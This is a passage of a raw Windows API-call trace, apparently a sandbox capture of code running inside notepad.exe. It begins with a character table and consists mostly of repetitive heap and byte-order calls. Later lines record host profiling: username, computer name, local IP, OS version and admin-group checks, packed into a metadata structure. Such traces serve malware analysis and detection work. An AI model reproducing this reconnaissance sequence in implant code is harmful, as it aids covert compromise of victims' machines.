!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04S-¨ä÷.", lpUsedDefaultChar=0x0) returned 256 [0086.628] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1e29f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\notepad.exe" (normalized: "c:\\windows\\syswow64\\notepad.exe")) returned 0x1f [0086.628] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.629] SetLastError (dwErrCode=0x0) [0086.629] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.630] SetLastError (dwErrCode=0x0) [0086.630] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.631] SetLastError (dwErrCode=0x0) [0086.631] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x28) returned 0x1f519b0 [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.632] SetLastError (dwErrCode=0x0) [0086.632] GetLastError () returned 0x0 [0086.633] SetLastError (dwErrCode=0x0) [0086.633] GetLastError () returned 0x0 [0086.633] SetLastError (dwErrCode=0x0) [0086.633] GetLastError () returned 0x0 [0086.633] SetLastError (dwErrCode=0x0) [0086.633] GetLastError () returned 0x0 [0086.633] SetLastError (dwErrCode=0x0) [0086.633] GetLastError () returned 0x0 [0086.633] SetLastError (dwErrCode=0x0) [0086.633] GetLastError () returned 0x0 [0086.633] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.663] GetLastError () returned 0x0 [0086.663] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.664] SetLastError (dwErrCode=0x0) [0086.664] GetLastError () returned 0x0 [0086.665] SetLastError (dwErrCode=0x0) [0086.665] GetLastError () returned 0x0 [0086.665] SetLastError (dwErrCode=0x0) [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x98) returned 0x1f519e0 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1f) returned 0x1f51a80 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x2b) returned 0x1f51aa8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x37) returned 0x1f51ae0 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x3c) returned 0x1f51b20 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x31) returned 0x1f51b68 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x18) returned 0x1f51ba8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x24) returned 0x1f51bc8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x14) returned 0x1f51bf8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0xd) returned 0x1f51c18 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1a) returned 0x1f51c30 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x2e) returned 0x1f51c58 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x19) returned 0x1f51c90 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x17) returned 0x1f51cb8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0xe) returned 0x1f51cd8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x95) returned 0x1f51cf0 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x3e) returned 0x1f51d90 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1b) returned 0x1f51dd8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1d) returned 0x1f51e00 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x48) returned 0x1f51e28 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x12) returned 0x1f51e78 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x18) returned 0x1f51e98 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1b) returned 0x1f51eb8 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x24) returned 0x1f51ee0 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x29) returned 0x1f51f10 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1e) returned 0x1f51f48 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x6b) returned 0x1f51f70 [0086.665] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x17) returned 0x1f51fe8 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0xf) returned 0x1f52008 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x16) returned 0x1f52020 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x2a) returned 0x1f52040 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x29) returned 0x1f52078 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x16) returned 0x1f520b0 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x13) returned 0x1f520d0 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x1f) returned 0x1f520f0 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x12) returned 0x1f52118 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x18) returned 0x1f52138 [0086.666] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x46) returned 0x1f52158 [0086.670] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f509f0 | out: hHeap=0x1f50000) returned 1 [0086.671] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x80) returned 0x1f509f0 [0086.671] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x800) returned 0x1f521a8 [0086.671] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef828 | out: lpSystemTimeAsFileTime=0x2ef828*(dwLowDateTime=0x78126080, dwHighDateTime=0x1d809f7)) [0086.672] RtlSizeHeap (HeapHandle=0x1f50000, Flags=0x0, MemoryPointer=0x1f509f0) returned 0x80 [0086.676] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x200) returned 0x1f50a78 [0086.681] htons (hostshort=0x100) returned 0x1 [0086.681] htons (hostshort=0x100) returned 0x1 [0086.681] htons (hostshort=0x200) returned 0x2 [0086.681] htons (hostshort=0x0) returned 0x0 [0086.681] htons (hostshort=0x200) returned 0x2 [0086.681] htons (hostshort=0x100) returned 0x1 [0086.681] htons (hostshort=0x200) returned 0x2 [0086.681] htons (hostshort=0x3630) returned 0x3036 [0086.681] htons (hostshort=0x300) returned 0x3 [0086.681] htons (hostshort=0x200) returned 0x2 [0086.681] htons (hostshort=0x400) returned 0x4 [0086.681] htonl (hostlong=0x60ea0000) returned 0xea60 [0086.681] htons (hostshort=0x400) returned 0x4 [0086.681] htons (hostshort=0x200) returned 0x2 [0086.681] htons (hostshort=0x400) returned 0x4 [0086.681] htonl (hostlong=0x1000) returned 0x100000 [0086.681] htons (hostshort=0x500) returned 0x5 [0086.681] htons (hostshort=0x100) returned 0x1 [0086.681] htons (hostshort=0x200) returned 0x2 [0086.681] htons (hostshort=0x0) returned 0x0 [0086.681] htons (hostshort=0x600) returned 0x6 [0086.681] htons (hostshort=0x100) returned 0x1 [0086.681] htons (hostshort=0x200) returned 0x2 [0086.681] htons (hostshort=0xff00) returned 0xff [0086.681] htons (hostshort=0x700) returned 0x7 [0086.681] htons (hostshort=0x300) returned 0x3 [0086.681] htons (hostshort=0x1) returned 0x100 [0086.682] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100) returned 0x1f50c80 [0086.683] htons (hostshort=0x800) returned 0x8 [0086.683] htons (hostshort=0x300) returned 0x3 [0086.683] htons (hostshort=0x1) returned 0x100 [0086.683] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100) returned 0x1f50d88 [0086.683] htons (hostshort=0x900) returned 0x9 [0086.683] htons (hostshort=0x300) returned 0x3 [0086.683] htons (hostshort=0x8000) returned 0x80 [0086.683] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f50e90 [0086.683] htons (hostshort=0xa00) returned 0xa [0086.683] htons (hostshort=0x300) returned 0x3 [0086.683] htons (hostshort=0x4000) returned 0x40 [0086.683] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x40) returned 0x1f50f18 [0086.683] htons (hostshort=0xb00) returned 0xb [0086.683] htons (hostshort=0x300) returned 0x3 [0086.683] htons (hostshort=0x1) returned 0x100 [0086.683] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100) returned 0x1f529b0 [0086.683] htons (hostshort=0xc00) returned 0xc [0086.683] htons (hostshort=0x300) returned 0x3 [0086.683] htons (hostshort=0x1) returned 0x100 [0086.683] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100) returned 0x1f52ab8 [0086.684] htons (hostshort=0xd00) returned 0xd [0086.684] htons (hostshort=0x300) returned 0x3 [0086.684] htons (hostshort=0x1) returned 0x100 [0086.684] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100) returned 0x1f52bc0 [0086.684] htons (hostshort=0xe00) returned 0xe [0086.684] htons (hostshort=0x300) returned 0x3 [0086.684] htons (hostshort=0x1000) returned 0x10 [0086.684] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f50f60 [0086.684] htons (hostshort=0x1d00) returned 0x1d [0086.684] htons (hostshort=0x300) returned 0x3 [0086.684] htons (hostshort=0x4000) returned 0x40 [0086.684] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x40) returned 0x1f52cc8 [0086.684] htons (hostshort=0x1e00) returned 0x1e [0086.684] htons (hostshort=0x300) returned 0x3 [0086.684] htons (hostshort=0x4000) returned 0x40 [0086.684] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x40) returned 0x1f52d10 [0086.684] htons (hostshort=0xf00) returned 0xf [0086.684] htons (hostshort=0x300) returned 0x3 [0086.684] htons (hostshort=0x8000) returned 0x80 [0086.684] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f52d58 [0086.684] htons (hostshort=0x1f00) returned 0x1f [0086.684] htons (hostshort=0x100) returned 0x1 [0086.684] htons (hostshort=0x200) returned 0x2 [0086.684] htons (hostshort=0x0) returned 0x0 [0086.684] htons (hostshort=0x1300) returned 0x13 [0086.684] htons (hostshort=0x200) returned 0x2 [0086.684] htons (hostshort=0x400) returned 0x4 [0086.684] htonl (hostlong=0x0) returned 0x0 [0086.684] htons (hostshort=0x1400) returned 0x14 [0086.684] htons (hostshort=0x200) returned 0x2 [0086.684] htons (hostshort=0x400) returned 0x4 [0086.684] htonl (hostlong=0x0) returned 0x0 [0086.685] htons (hostshort=0x1a00) returned 0x1a [0086.685] htons (hostshort=0x300) returned 0x3 [0086.685] htons (hostshort=0x1000) returned 0x10 [0086.685] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f52de0 [0086.685] htons (hostshort=0x1b00) returned 0x1b [0086.685] htons (hostshort=0x300) returned 0x3 [0086.685] htons (hostshort=0x1000) returned 0x10 [0086.685] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f52df8 [0086.685] htons (hostshort=0x1c00) returned 0x1c [0086.685] htons (hostshort=0x200) returned 0x2 [0086.685] htons (hostshort=0x400) returned 0x4 [0086.685] htonl (hostlong=0x0) returned 0x0 [0086.685] htons (hostshort=0x2500) returned 0x25 [0086.685] htons (hostshort=0x200) returned 0x2 [0086.685] htons (hostshort=0x400) returned 0x4 [0086.685] htonl (hostlong=0x78563412) returned 0x12345678 [0086.685] htons (hostshort=0x2600) returned 0x26 [0086.685] htons (hostshort=0x100) returned 0x1 [0086.685] htons (hostshort=0x200) returned 0x2 [0086.685] htons (hostshort=0x0) returned 0x0 [0086.685] htons (hostshort=0x2700) returned 0x27 [0086.685] htons (hostshort=0x100) returned 0x1 [0086.685] htons (hostshort=0x200) returned 0x2 [0086.685] htons (hostshort=0x0) returned 0x0 [0086.685] htons (hostshort=0x3600) returned 0x36 [0086.685] htons (hostshort=0x300) returned 0x3 [0086.685] htons (hostshort=0x8000) returned 0x80 [0086.685] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f52e10 [0086.685] htons (hostshort=0x3200) returned 0x32 [0086.685] htons (hostshort=0x100) returned 0x1 [0086.685] htons (hostshort=0x200) returned 0x2 [0086.685] htons (hostshort=0x100) returned 0x1 [0086.685] htons (hostshort=0x2300) returned 0x23 [0086.686] htons (hostshort=0x100) returned 0x1 [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x3700) returned 0x37 [0086.686] htons (hostshort=0x100) returned 0x1 [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x0) returned 0x0 [0086.686] htons (hostshort=0x2800) returned 0x28 [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x400) returned 0x4 [0086.686] htonl (hostlong=0x0) returned 0x0 [0086.686] htons (hostshort=0x2900) returned 0x29 [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x400) returned 0x4 [0086.686] htonl (hostlong=0x0) returned 0x0 [0086.686] htons (hostshort=0x2b00) returned 0x2b [0086.686] htons (hostshort=0x100) returned 0x1 [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x4000) returned 0x40 [0086.686] htons (hostshort=0x2c00) returned 0x2c [0086.686] htons (hostshort=0x100) returned 0x1 [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x4000) returned 0x40 [0086.686] htons (hostshort=0x2d00) returned 0x2d [0086.686] htons (hostshort=0x200) returned 0x2 [0086.686] htons (hostshort=0x400) returned 0x4 [0086.686] htonl (hostlong=0x0) returned 0x0 [0086.686] htons (hostshort=0x2e00) returned 0x2e [0086.686] htons (hostshort=0x300) returned 0x3 [0086.686] htons (hostshort=0x1) returned 0x100 [0086.686] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100) returned 0x1f52e98 [0086.686] htons (hostshort=0x2f00) returned 0x2f [0086.686] htons (hostshort=0x300) returned 0x3 [0086.686] htons (hostshort=0x1) returned 0x100 [0086.686] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100) returned 0x1f52fa0 [0086.687] htons (hostshort=0x3500) returned 0x35 [0086.687] htons (hostshort=0x300) returned 0x3 [0086.687] htons (hostshort=0x1000) returned 0x10 [0086.687] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f530a8 [0086.687] htons (hostshort=0x3300) returned 0x33 [0086.687] htons (hostshort=0x300) returned 0x3 [0086.687] htons (hostshort=0x8000) returned 0x80 [0086.687] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f530c0 [0086.687] htons (hostshort=0x3400) returned 0x34 [0086.687] htons (hostshort=0x100) returned 0x1 [0086.687] htons (hostshort=0x200) returned 0x2 [0086.687] htons (hostshort=0x0) returned 0x0 [0086.687] htons (hostshort=0x0) returned 0x0 [0086.694] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f53148 [0086.694] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x380) returned 0x1f53160 [0086.696] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100000) returned 0x2080020 [0086.697] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x100000) returned 0x2190020 [0086.697] GetACP () returned 0x4e4 [0086.697] GetOEMCP () returned 0x1b5 [0086.703] CryptAcquireContextA (in: phProv=0x2ef81c, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2ef81c*=0x581200) returned 1 [0087.236] CryptGenRandom (in: hProv=0x581200, dwLen=0x10, pbBuffer=0x2ef874 | out: pbBuffer=0x2ef874) returned 1 [0087.236] CryptReleaseContext (hProv=0x581200, dwFlags=0x0) returned 1 [0087.238] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x70) returned 0x1f534e8 [0087.245] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f534e8 | out: hHeap=0x1f50000) returned 1 [0087.251] GetCurrentProcessId () returned 0xf48 [0087.251] GetTickCount () returned 0x1c23bff [0087.251] GetLastError () returned 0x0 [0087.251] SetLastError (dwErrCode=0x0) [0087.252] CryptAcquireContextA (in: phProv=0x2ef80c, szContainer=0x0, szProvider="Microsoft Base Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x2ef80c*=0x581200) returned 1 [0087.252] CryptGenRandom (in: hProv=0x581200, dwLen=0x4, pbBuffer=0x2ef830 | out: pbBuffer=0x2ef830) returned 1 [0087.253] CryptReleaseContext (hProv=0x581200, dwFlags=0x0) returned 1 [0087.253] GetCurrentProcess () returned 0xffffffff [0087.259] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0087.259] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0087.259] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2ef830 | out: Wow64Process=0x2ef830*=1) returned 1 [0087.259] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2ef82c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2ef824 | out: pSid=0x2ef824*=0x579ce0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0087.259] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x579ce0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x2ef828 | out: IsMember=0x2ef828) returned 1 [0087.260] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f534e8 [0087.260] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x394) returned 0x1f53500 [0087.260] GetUserNameA (in: lpBuffer=0x1f53694, pcbBuffer=0x2ef82c | out: lpBuffer="kEecfMwgj", pcbBuffer=0x2ef82c) returned 1 [0087.268] GetComputerNameA (in: lpBuffer=0x1f53594, nSize=0x2ef82c | out: lpBuffer="Q9IATRKPRH", nSize=0x2ef82c) returned 1 [0087.269] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x2ef660 | out: lpWSAData=0x2ef660) returned 0 [0087.280] gethostname (in: name=0x1f53794, namelen=256 | out: name="Q9iATrkPrH") returned 0 [0088.474] gethostbyname (name="Q9iATrkPrH") returned 0x20447c8*(h_name="Q9iATrkPrH", h_aliases=0x20447d8*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x20447dc*=([0]="192.168.0.242")) [0089.160] inet_ntoa (in=0xf200a8c0) returned="192.168.0.242" [0089.160] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1f53794, nSize=0x100 | out: lpFilename="C:\\Windows\\SysWOW64\\notepad.exe" (normalized: "c:\\windows\\syswow64\\notepad.exe")) returned 0x1f [0089.161] GetVersionExA (in: lpVersionInformation=0x1f53500*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1f53500*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.161] GetLastError () returned 0x0 [0089.161] SetLastError (dwErrCode=0x0) [0089.162] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53500 | out: hHeap=0x1f50000) returned 1 [0089.162] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f534e8 | out: hHeap=0x1f50000) returned 1 [0089.162] htonl (hostlong=0x1) returned 0x1000000 [0089.162] htonl (hostlong=0x0) returned 0x0 [0089.162] htonl (hostlong=0x10) returned 0x10000000 [0089.162] htonl (hostlong=0x12) returned 0x12000000 [0089.162] htonl (hostlong=0x14) returned 0x14000000 [0089.162] htonl (hostlong=0x183f1344) returned 0x44133f18 [0089.162] htonl (hostlong=0x18) returned 0x18000000 [0089.162] GetCurrentProcessId () returned 0xf48 [0089.162] htonl (hostlong=0xf48) returned 0x480f0000 [0089.162] htonl (hostlong=0x1c) returned 0x1c000000 [0089.162] htons (hostshort=0x0) returned 0x0 [0089.162] htonl (hostlong=0x1e) returned 0x1e000000 [0089.162] htonl (hostlong=0x1f) returned 0x1f000000 [0089.162] htonl (hostlong=0x51) returned 0x51000000 [0089.162] htonl (hostlong=0xbeef) returned 0xefbe0000 [0089.162] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f534e8 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f53500 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f53588 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f535a0 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f53628 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f53640 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f536c8 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x80) returned 0x1f536e0 [0089.166] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x10) returned 0x1f53768 [0089.167] RtlAllocateHeap 